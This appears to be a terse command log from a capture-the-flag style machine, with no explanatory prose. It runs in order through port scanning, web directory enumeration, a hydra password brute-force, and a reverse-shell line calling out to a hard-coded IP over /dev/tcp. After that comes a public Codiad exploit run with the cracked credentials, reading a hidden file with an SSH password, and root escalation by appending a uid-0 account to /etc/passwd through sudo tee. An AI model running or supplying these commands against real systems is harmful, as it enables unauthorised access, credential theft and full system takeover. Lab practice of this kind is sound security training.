nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-get "/inferno/" -V
echo 'bash -c "bash -i >/dev/tcp/10.10.183.11/4445 0>&1 2>&1"' | nc -lnvp 4444
searchsploit codiad
searchsploit -m multiple/webapps/49705.py
python3 49705.py http://admin:dante1@$VICTIM/inferno/ admin dante1 $KALI 4444 linux
python3 -c 'import pty; pty.spawn("/bin/sh")'
ctrl + Z
stty raw -echo;fg
cd /home/dante/Downloads
ls -lah
cat .download.dat
ssh dante@$VICTIM
Password: V1rg1l10h3lpm3
LFILE=/etc/passwd
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"
su new
Password: 123